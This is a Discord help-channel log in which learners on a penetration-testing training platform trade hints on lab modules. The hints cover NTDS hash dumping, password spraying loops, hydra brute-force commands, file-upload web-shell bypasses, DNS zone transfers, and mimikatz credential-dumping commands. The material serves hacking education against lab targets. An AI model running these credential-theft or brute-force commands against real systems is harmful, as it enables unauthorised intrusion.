acoustic owl
acoustic owl
languid galleon
#

Module: PHP Web Shell

Each time I run Burp I get yelled at with a security warning. I've reset multiple times using the pwnbox and tried it multiple times in my own VM - I can't escape the message. My google searches aren't helpful.

I understand the lesson perfectly, I just don't know how to get around this certificate message so I can run Burp and answer the second question. Any tips (or better things to google) would be appreciated.

rustic sage
#

@languid galleon Not sure what message you get, try a screenshot or writing down the error message?

nimble lodge
#

I'm learning the nmap enumeration in academy. I got this question to scan a hostname of the target. But I do not find any scanning command for the hostname? Can anyone help me with this?

grim pivot
#

yoo

#

i just fired up meow and i cannot ping the machine whilst being in the same vpn , am i doing anything wrong here ?

lusty thicket
jovial fractal
#

There is something wrong with the ACTIVE DIRECTORY ENUMERATION & ATTACKS module lab?? I can't connect to any labs, it gets stuck and then shuts down.

nimble lodge
jovial fractal
proud pine
orchid pine
#

hello guys

jovial fractal
orchid pine
#

any idea hoe to dump a file .dit

#

to extract the hashes

vital adder
grim pivot
#

but the walkthrough said it can be pinged

vital adder
#

which module and section are you on?

grim pivot
#

starting point

#

im sorry im a newbie

orchid pine
#

they *

#

then i need to extract the systeme as well

vital adder
vital adder
#

which the last one is kinda ass but for dumping the hash from that ntds file you can just use imapcket-secretsdump (a quick google away)

grim pivot
calm phoenix
#

m

#

Hi

sonic ridge
#

is there a place to ask general questions

tiny reef
#

Can anybody give me a dumbed down version for the Server-Side Attacks: Nginx Reverse Proxy & AJP what the heck is actually happening there? Like I got the flag by just replicating but I had no clue what to do? Very bad explanation when compared to other modules

fathom pendant
high reef
#

I'm doing the RDP and SOCKS Tunneling with SocksOverRDP

#

i've configured the proxifier

#

but when i run mstsc.exe its not pivoting to 172.16.6.155

fathom pendant
#

Follow the section to a T and it will work

keen compass
#

hi, when using cme for password spraying with both a user.list and password.list, i thought there were a parameter to tell cme to first try first password in the list with all users, then second password, etc. I can't find this parameter again... can someone tell me if this parameter exists please ?

high reef
fathom pendant
#

From the foothold

high reef
#

because when i do it on 10.129.x.x it prompts me for username and password and i put jason since i wann connect to that host but i get nothing

#

the foothold would be 10.129

fathom pendant
#

You start mstc.exe on foothold, put in the ip for the target you're looking for, enter username and password

high reef
#

i keep getting this error

#

i'll figure it out tho thanks @fathom pendant

fathom pendant
#

Did you also start the socksoverrdp.dll as shown?

high reef
#

yea

#

rebooting machine ad doing steps from sqaure zero

high reef
#

did the exact same steps

#

i got the rdp session to let me in but having three rdp sessions open can't load for nothing

fading oracle
#

hey guys! i have some problems in the footprinting section

#

Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.

#

with this question

#

i managed to connect to the database but cant find the answer

verbal kraken
#

hey everyone, can someone help me change this regex \/documents.*?.pdf to match any extension and not just pdf

#

i am horrible at regex and this is getting in my way

fading oracle
#

can any1one help?

ashen umbra
fading oracle
#

can i dm? @ashen umbra

ashen umbra
#

yep

fading oracle
#

sent

ashen umbra
#

Having issues with credential hunting in linux on the password cracking module.

I cant gain initial access even after using the hint and trying regular lists/mutated lists with hydra. Anyone have an idea of what I am missing?

#

The hint doesn't seem to help as the password given for the user does not work on ssh and I attempted a mutated list with that password with the custom rule.

fringe shell
keen compass
fringe shell
#

Something like below... but i haven't tried this myself

#!/bin/bash

target="192.168.0.1"

for password in $(cat passwords.txt); do
    crackmapexec smb $target -u users.list -p $password
done
fringe shell
torn stratus
#

Hey folks, I am having a difficult time with (linux fundamentals) Task scheduling with the question (what is the type of the service of the "syslog.service"?

lusty thicket
torn stratus
lusty thicket
torn stratus
lusty thicket
#

<@&861185840277487616>

novel matrix
fresh bramble
#

Did you get an answer to this? I am at the same point - won't accept??

tight mesa
#

hello y'all, any hint for Lab Medium from Attacking common services?

#

I tried BF on none estandard ftp ports with no success..!!!

short hare
tight mesa
#

let me try again cuz I guess I tried already, but ty btw

short hare
#

./subbrute.py given_domain_name -s ./names.txt -r ./resolvers.txt

From there you will find some other subdomains

Then
dig @IP axfr one_of_the_found_sub-domain

Just hit and try you will get something

short hare
tight mesa
short hare
tight mesa
#

hmm ok., make sense

short hare
nova wharf
#

hey guys quick question if I'm running a nmap scan on a target in the modules do I need to include the port number that is being displayed also ie 94.237.56.76:43256 or can I run it like a normal nmap scan?

lusty thicket
short hare
nova wharf
#

@lusty thicket thanks, only asked because I was getting a weird print out that I never got before 'RTTVAR has grown to over 2.3 seconds, decreasing to 2.0' never had that show up before

#

I've been on THM and just started academy so I'm making that switch

#

yea I tired to get version info but it just showed filtered and no info

lusty thicket
final maple
#

Anyone want to start a study group with me on the new NTLM Relay Attacks module?

fathom pendant
#

You'll have better luck doing web enumeration on it. (Visiting the webpage, using whatweb) usually the module tells you what it's expecting

nova wharf
fathom pendant
nova wharf
fathom pendant
#

The module section tells you explicitly that it's going to have you do other techniques, if I'm assuming you're on one of the startup modules

nova wharf
#

yeah I am in the beginning stages of the Pentest pathway

#

the thing is the public exploits section mentions using nmap to enum the ports and then look up the services

fathom pendant
#

It's a big bag of it depends

#

If you're given a public ip and port (not 10.129.x.x) then assume web

nova wharf
#

alright thanks I'll keep that in mind moving forward

fathom pendant
nova wharf
limber river
#

is it normal to have this extra cube ?

fathom pendant
#

¯_(ツ)_/¯

fathom pendant
nova wharf
limber river
#

but 401 ? it's weird lol

fathom pendant
golden arch
#

can i pm someone for a hint in FIle Inclusion module? LFI and File Uploads section

fathom pendant
#

Not directly when you complete them

limber river
limber river
golden arch
#

I think is better pm someone... maybe if i ask i can give extra information

dawn agate
#

Hey all! I'm currently going through the "Active Directory Enumeration & Attacks" Module. In the "Windows Defender" section it says and I quote "Windows Defender has improved over the years to block tools such as PowerView. There are ways to bypass these protections. These ways will be covered in other modules." Which other modules is it referring to? I'm interested in reading about them.

acoustic owl
tight glen
#

what am i going to do when tampering protection is activated 😦

coarse void
#

try disable it from settings

tight glen
#

thats what tampering protection is against

#

Not saying i need it, im not doing the module

coarse void
gaunt estuary
#

I'm trying to do starting point and I'm getting this error:
"Stop your Active machine before starting a new one"

#

I don't know how to solve it

coarse void
#

or go to the next session, active another target then come back and try again

gaunt estuary
#

All right, thank you so much

raven locust
#

trying to progress with the passwords medium lab but the ssh session keeps freezing augh

short hare
#

Feeling a little lighter! catlul

raven locust
#

gj! how’d you find it?

short hare
raven locust
#

the module, what did you think of it

short hare
quick magnet
#

connect to the web server on the internal network

golden wagon
#

May I know if I renew Silver Annual, is the one exam ticket I acquired from the previous membership period applicable for the new year period (old + new exam voucher= totally 2 vouchers remaining), or would be permanently expired?

acoustic owl
#

As far as I know, an exam voucher is only valid for one year. That means it would expire.

But to be sure, ask the support.

harsh moat
#

Have you solved this issue? I'm having the same issue

acoustic owl
short hare
#

You need to go like this:

Get access to SMB with user Jason and his password.
You will find a file, you need to crack this file as it is protected by password and look into it

Look at the files contents and then you will find more clues to move forward

zinc rampart
#

should i learn networking and linux before getting into hacking?

limber river
gaunt estuary
#

Someone knows why Meow machine doesn't work?

#

Im trying to do the "Starting point" but when I click "SPAWN MACHINE" I'm getting this error:
"Error!

Machine failed to deploy."

vital adder
mortal basin
autumn pilot
acoustic owl
#

@mortal basin Do you actually wait until I have finished a module to publish a new module a few minutes later? 🤣

zinc rampart
languid galleon
zinc thunder
#

Hi. Could anyone help me with FILE UPLOAD ATTACKS - Type Filters.
tried .pht .phar .pgif .phtml with image/gif image/jpeg image/png and GIF89a and GIF87a.

limber river
limber river
#

It should be "image/gif"

short hare
# mortal basin 🔥

Medium Level Modules are enough to bang head on wall

How much hard, hard modules are gonna be...NotLikeThis

mortal basin
# short hare Medium Level Modules are enough to bang head on wall How much hard, hard module...

quite hard, and getting harder 😅 but we always keep a steady increase in difficulty, so if you follow a path it should gradually build your skills, such that you never feel it's way above your level, but only slightly above your current level so that your skills would improve..
that's how a path takes you from beginner to intermediate, and then from intermediate to advanced 😎

mortal basin
limber river
lethal shard
#

vautia makes a great assessments in the end of each section

short hare
mortal basin
acoustic owl
short hare
limber river
lethal shard
#

waiting for ADCS modules, av/edr evasion, cloud security modules 🙂

mortal basin
zinc thunder
vital adder
lethal shard
acoustic owl
mortal basin
mortal basin
acoustic owl
midnight plinth
#

I’m the attached image it says “here we can see…” and I don’t really understand how we can tell that the 10.129.0.0/16 network is accessible via tun0 via 10.10.14.0/24 network. Would anyone be able to clear it up for me?

wooden willow
#

How can I upload a snapshot here?

#

The above link has a question.

lusty thicket
acoustic owl
wooden willow
acoustic owl
wooden willow
acoustic owl
wooden willow
#

okay, thanks.

acoustic owl
#

But you can simply create an account

lusty thicket
wooden willow
#

Found it.

wooden willow
#

The task is to download specific file from specific target.

limber river
#

For ex curl http://.......

wooden willow
#

ohk

#

I am accustomed to using address without http:// 🙂

#

My mistake.

#

Thanks buddy.

#

@limber river

limber river
oblique cove
#

does anyone know how to terminate a machine after i finished?

sharp wing
#

can anyone hack a discord server?

midnight plinth
#

Well I’d often wondered how to get a quick ban from discord lol

sharp wing
#

i mean they are a toxic people

lusty thicket
molten prawn
narrow solar
#

hey friends, i am at Attacking Common Applications Exploiting Web Vulnerabilities in Thick-Client Applications, i am having this error after editing the open function to download the file and it doesn't download it to the desktop, tons of other people having this issue at forums and no clear answer, any help please

vital adder
rotund urchin
#

Can someone help with what extension to use on the black list filters exercise in the file upload attacks section?

limber river
rotund urchin
#

I have done that, found the ones that allow me to upload, but nothing is still executing the script

#

so trying to figure out what else I am doing wrong. I just keep repeating with different extensions but same result.

limber river
rotund urchin
#

not sure what you mean sorry

limber river
rotund urchin
#

I know the section says "not all extensions will work with all web server configurations" but this is just a huge waste of time. I am on my 10th extension and there is no way it should be this trivial. That is why I feel like I am missing something but I dont know what.

#

I have my list of what is blacklisted and I get the succseful file upload, so idk

limber river
rotund urchin
#

length=188 are the blacklisted ones

limber river
rotund urchin
#

This is one of the more recent ones I did, but same concept for all other extensions/payloads

limber river
rotund urchin
#

/profile_images/shell.php6?cmd=id

limber river
rotund urchin
#

ok one sec

#

fuzz with the web extensions?

limber river
rotund urchin
#

I found .phps with a different response

limber river
rotund urchin
limber river
#

Not here

rotund urchin
#

I know, but I cant get my script to upload to view the flag lol

limber river
rotund urchin
#

yes and it gave me phps

limber river
#

Could you show me in burp?

rotund urchin
limber river
rotund urchin
limber river
quasi wave
#

so I'm trying to find the flag that one of these services contain and submit it as the answer. This is for NSE section of Nmap module. I did a scan and found port 31337 is open. I went into web browser and found it was an apache server. Am I on the right track? Is there anything I can research to help find the answer without being given answer directly?

#

I did a vulnerabilities scan now doing a version scan

#

Agressive scan said version is 3.13 so no point

#

but so do I just look up apache 3.13 vulnerabilities

#

I mean Linux version 3.13

#

not apache version but is using apache web server

#

apache version 2

#

or will gobuster be useful?

lusty thicket
quasi wave
#

ok thanks

#

ok thanks found flag

smoky viper
#

Can someone help me with the password attack hard lab. I've downloaded the .V** file and used John to crack. The instructions says to use -i , which when done shows some hashes. I've tried using PTH, but it doesn't work.

open quail
tawdry vapor
#

Can anyone help me with the password attack module, i'm doing the password attack lab -HARD

acoustic owl
#

What exactly is not working?

slate forum
#

guys, who knows what the problem is with the machine not starting?

tawdry vapor
#

but i don't know what i do now

orchid pine
#

hello guys
can someone explain this question
i didnt get it
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
i need to perform a pass the has attack on my attack box
then set up a nc listener the target to get the reverse shell is that right

mossy hatch
#

Hi can someone give me a hint for the sql injection question " Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer." in web service & api attacks, i tried all the injections and i url encoded but none work everytime i get 'Enter a valid param for HackTheB0X API'

summer umbra
queen barn
#

Hey guys! I'm trying to spawn machines but cannot. Additionally I cannot submit tickets for support. This is a paid account

#

I tried on multiple devices

orchid pine
#

do you need any help

#

check dms

sly dome
#

That equation has infinite number of solutions since its the equation of a straight line

tawdry vapor
#

how can i mount .vhd file in kali??

fathom pendant
#

You can Google it. But also you can just mount it in a windows machine

tawdry vapor
#

i tryied

#

but doesn't work

#

i'm in the password attack lab hard

#

i dowloaded the .vhd file

fathom pendant
#

I know, I've done it on a windows machine ¯_(ツ)_/¯

#

You need to crack the password to be able to do anything with it

tawdry vapor
#

how can i crack?

fathom pendant
#

1 figure out how it's encrypted
2 use the associated 2john python file
3 use john to Crack it

fathom pendant
#

Maybe run apt-get update, or try with --fix-missing

echo roost
#

why do colums vs a rows still confuse me in Sqli sometimes... If someone were to show you a union statement without context. You really wouldn't know if it was a database name, table_name or column name without enumerating right? Since we're essentially injecting commands into columns the database names, table names or column names show up in the columns usually starting at column 2 depending on the type of SQLi. That concept took me forever to understand until I understood how the data was showing up vs how is looks inside a database.

echo roost
# tawdry vapor

Is your vm connecting to the internet? Looks like a bunch of failed GET requests.

#

sudo apt update then sudo apt install?

lusty thicket
# tawdry vapor

it looks like the library might not be available in kali’s repository

#

so you can try downloading from a third party repository idk tho

analog dock
#

Did you end up figuring this out? I’m stuck on the skills assessment as well, don’t really feel prepared for it from the modules either

tight mesa
#

hello y'all, anyone could let me know what is wronge with command : smbclient -U WIN-HARD/simon --password=lxxxxxxxl //10.129.203.10

rustic sage
#

hello fellow hackers

#

are we asking silly questions here again

tidal mango
#

Lets see if I can word this question correctly... Doing a PTT attack (I am reviewing the password attacks module, on pass the ticket section), is there anyway to complete a full PTT with just Rubeus? It seems like to get the ekey I need to use for the PTT I can only do that with mimikatz. Is that correct? Or is there a way to use any of the base64 output I get from running Rubeus dump /nowrap for the PTT or another method with Rubeus only? Thanks!

keen oasis
tidal mango
tidal mango
tawdry vapor
#

Can anyone help me with the password attack module, i'm doing the password attack lab -HARD

#

?

tidal mango
#

what part do you need help on?

tawdry vapor
#

i downloaded the .vhd file, but i can't mount

tidal mango
#

yeah... I had a hard time with that, I used windows, I think I have a command that works, let me check

tight mesa
tight mesa
velvet haven
#

I keep getting a permission denied error

ssh htb-student@172.16.5.225

Solution:

1. Don't copy paste the password just type it

2. Copy the password and when password prompt shows just right click at that moment it would paste that password and then press enter it would work
fathom pendant
#

Why are you jumping straight to the second host? Unless you're already on the first?

fathom pendant
#

In terminal you need to add [shift] to the [ctrl] - [v] combo

velvet haven
#

if i copy password and just right click on password prompt it works

fathom pendant
#

¯_(ツ)_/¯

#

Probably a thing with pwnbox sometimes the browser doesn't let you copy/paste

tawdry vapor
#

i'm stuck for a few hours

opaque marlin
#

do you know if there are any plans to including videos on the modules

thorn urchin
#

zero plans

tawdry vapor
fathom pendant
# tawdry vapor 😭 😭 😭

There have been several resources posted here about mounting in Linux, and as most users have stated you can also mount in a windows environment.

#

Literally searching up the encryption type in discord search nets me multiple results

rustic sage
fathom pendant
# tawdry vapor 😭 😭 😭

And my other question is: were you intending on just getting the answer here and not even trying to do the research yourself?

fathom pendant
rustic sage
#

this place is just as poopy covered as any of the others places in infosec

fathom pendant
tawdry vapor
#

thats why i came here and ask

#

i'm trying this for a few hours

rustic sage
#

Question for you Gigloti

fathom pendant
#

pika_sip it also doesn't help when you don't provide your errors

rustic sage
#

Why are you not pestering ChatGPT with your questions?

fathom pendant
#

Unless you're referring to the kali 404 errors: in which case I'd suggest updating your kali

tawdry vapor
fathom pendant
rustic sage
#

I do hope you will use it, all your questions this far can be easily answered by LLM's

fathom pendant
# tawdry vapor

It's probably gonna register as empty or near empty bc there's like 1 file in it

tawdry vapor
#

i got it this password

#

is right?

fathom pendant
#

That looks correct

#

it's been a minute ¯_(ツ)_/¯

tawdry vapor
#

but it's not working cause a have de "!"

fathom pendant
#

Why are you supplying the password to the user argument first off

#

Second off, single quotes

tawdry vapor
fathom pendant
#

Switch -u to -c

#

Oh wait it is -u

#

Anyway since you seem incapable of actually using available resources: this is what most people have used

tawdry vapor
#

my mind is so confused

#

but i'm trying

smoky viper
#

Can someone help me with the password attack hard lab. I've downloaded the .V** file and used John to crack. The instructions says to use -i , which when done shows some hashes. I've tried using PTH, but it doesn't work.

tawdry vapor
#

i'm not alone with this module kakaka

fathom pendant
tawdry vapor
#

i'm asking here cause my mind is so confused

#

i'm trying harder and now i got it

lusty thicket
rustic sage
#

Did you lie to me when you said you were using ChatGPT?

#

shameful

tender schooner
#

I seem to be stuck with the Login Brute Forcing Skills Assessment - Website 2nd part. what i have is (hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-50.txt -t 4 -f xx.xx.xx.xx -s xxxx http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='submit'") is there something im missing? my guess is the form name submit but thats the only thing i cant find the name for and can only find the type of.

timber phoenix
#

Maybe

vital adder
#

plz stop spamming on all of the module channels if you don't have questions related to the academy

tender schooner
#

who plus?

vital adder
#

random guy, no idea

vital adder
tender schooner
#

attemting it atm, so far over 60 sec in, also using user, WAIT

#

got it like right when you sent that. thanks for the help anyway

smoky viper
#

Hey
The password attack hard lab.
When I mount the .vhd and extra the am and sys** files, and use samdump2, the NTLM is empty when I crack using crackstation. Any help

fiery berry
honest ridge
#

hey need a nudge with linux privesc section: Logroatate, so far transfer logrotten then run with logs going to access.log and it just hangs....

rustic sage
dusty lodge
#

Hey everyone

#

Anyone knows how do I search for Jeopardy type CTF only?

warm drift
#

please I'm trying to connect to SQL labs I keep getting error am I doing anything wrong?:

mysql -u root -h 94.237.48.48 -P 32638 -p
Enter password:
ERROR 2013 (HY000): Lost connection to server at 'handshake: reading initial communication packet', system error: 11

fathom pendant
dusty lodge
#

it is not?

#

sorry I'm new

fathom pendant
#

Then why are you asking here?

dusty lodge
fathom pendant
#

pika_sip take a good look at the names of the channels

dusty lodge
#

where should I ask that question then

fathom pendant
dusty lodge
#

alright

#

thanks for help

fathom pendant
#

¯_(ツ)_/¯

acoustic owl
fringe shell
#

boy that took some time! onto the exam I guess fingerguns

rustic sage
frozen mesa
#

SQL INJECTION FUNDAMENTALS --> skills assesment --> i get everything i want but i cant get it done to list the dir of the victim machine or accessing systemfiles.

Anyone can help me how to read the systemfiles via sqli?

rustic sage
#

How do I install WDK?

acoustic owl
rustic sage
#

Payload you are too nice

#

Bakki sends his regards

#

❤️

west onyx
tribal plinth
next umbra
#

Attacking Common Applications - Skill assessment II
I have all questions but the first one... What is the URL of the WordPress instance?
Would anyone be able to direct me to the right direction? Tried fuzzing the path using all DNS subdomains lists from seclist but nothing.

tribal plinth
next umbra
analog dock
#

It’s a well known subdomain

next umbra
#

Yes enumerated few times.
ok thanks, will keep looking into it.

analog dock
next umbra
tribal plinth
next umbra
analog dock
next umbra
#

I'm trying fuff and only getting gitlab ...

analog dock
#

What command are you running?

next umbra
#

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.local/
Not sure how to make it a spoiler... can delete once reviewed

analog dock
#

Yeah that won’t find it

next umbra
#

need to add the host and IP

analog dock
#

Within -u you put the target ip, so http://ip , and then you need to look into -H HOST

analog dock
#

The way you did it only shows gitlab, because I assume you added gitlab to your etc hosts file

next umbra
#

I see thanks, yes only added gitlab to the /etc/hosts file

analog dock
#

I’ve made that mistake a couple times as well. Till I added it to my notes 😄

next umbra
#

once I get it working will definetly put it into my notes hahaha

analog dock
#

If you put the target ip in -u, and what you initially tried to fuzz in -H ‘HOST:<put initial fuzz here>’ it should work

#

So fuzz.inlanefreight.local

#

Then as sentinal’s resource showed, you -fs the size that errors

west onyx
next umbra
#

got it thanks

analog dock
next umbra
#

added to my notes also 😅

analog dock
#

💪🏼

next umbra
#

1 down many more to go

zinc thunder
candid oracle
#

I am on the brute-force module and when I try to ssh with ssh b.gates@94.237.56.76 -p 22
I am getting the error b.gates@94.237.56.76: Permission denied (publickey).

Also when I try bruteforcing password using hydra I get [ERROR] target ssh://94.237.56.76:22/ does not support password authentication

#

How to proceed?

zinc thunder
# rotund urchin

.phar.jpg should do the trick.
DM me if you figgure out the type filter task. struggeling

raw venture
#
###  Skills Assessment - Service Login

Currently stuck on the last part of skills assessment. Found the valid credential but got the error of Permission denied ( publickey ). 
Tried to restart the lab few times but no luck. Anyone available for a nudge maybe I'm doing it wrong?~~~ Working now.
narrow solar
#

any help please, i am stuck for days

fiery berry
# narrow solar any help please, i am stuck for days
narrow solar
#

i was just reading it, thanks a lot, i will try it

narrow solar
fiery berry
vocal tusk
#

guys im stuck on the pass the ticket module im trying to gather the tickets but mimikatz is giving me an error any idea ?

#

and all i am trying to do is gather the tickets but this seems like a memory issue

vocal tusk
sly dome
#

Hello, what are the advantages of using a VPS as a pentester? I ask regarding “Setting Up” module

lilac bison
#

mimikatz # privilege::debug

The output will show whether you have the appropriate permissions to continue.

Then launch the logging functions to query your work.

mimikatz # log nameoflog.log

And finally, output all clear text passwords stored on the computer.

mimikatz # sekurlsa::logonpasswords

wooden willow
unreal sundial
#

Need a slight nudge on a DNS question.
trying to answer Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.

I'm trying : ||dig axfr inlanefreight.htb @10.129.15.89 | awk '$4 ~ /^\A/' | wc -l||

I also tried : ||nslookup -type=any -query=AXFR inlanefreight.htb ns.inlanefreight.htb | grep Name | wc -l||

This command: ||`gobuster dns -q -r "ns.inlanefreight.htb" -d "inlanefreight.htb" -w /usr/share/seclists/Discovery/DNS/combined_subdomains.txt'||
is still running because I wasn't given a specific word list or "numbers.txt" file as discribed in the section, so I'm a tad confused there as well. but that's a different question entirely

both of the things I tried gave me the same answer (clearly the wrong one).

wooden willow
dire birch
#

hello, im struggling with tls assestment, have some issues with decrypting token

wooden willow
wooden willow
acoustic owl
wooden willow
wooden willow
acoustic owl
#

Restart the Target

wooden willow
acoustic owl
#

When you start the target, it will run for 60, 90 or even 120 minutes.

#

Restart the lab, trust me

wooden willow
#

@acoustic owl It's working. Thanks a lot...

dire birch
#

hey payloadbunny, if i sent u my payload in tls assessment, would u tell me whats wrong?

dire birch
#

sent u dm

short gulch
#

The 172.16.8.20 machine in ATTACKING ENTERPRISE NETWORKS is very unstable and crashes often. It crashes when I interact thru website, it crashes when I am downloading file thru powershell, it crashes when I have xfreerdp session and surfe website at the same time

zinc marsh
#

Kerberos Attacks: Unconstrained Delegation - Users

#

I cannot get the tgt if someone can help me please

acoustic owl
rotund urchin
#

Can I get some help on the Limited File Uploads part in the File Upload Attacks Module? I am stuck on how to display the SVG images.

worn nova
#

Hey! i couldn't figure out the ans for the Web Requests module GET section can you please help??

ashen umbra
#

I want to transfer laZagne.exe to a server in which I have ssh access. What is the easiest way to do it? in credential hunting linux

tranquil axle
#

scp /source/lazagne.exe user@1.2.3.4:/destination/lazagne.exe

orchid pine
#

guys im on the password attacks easy lab

#

and like the brute forcing its taking forever more than 2h

ashen umbra
#

you changed the threads?

#

-t 48

orchid pine
#

48 thread

ashen umbra
#

a lot of these labs take awhile. did you try a mutated pass list

orchid pine
#

its not goibg to block the servise

#

i used bouth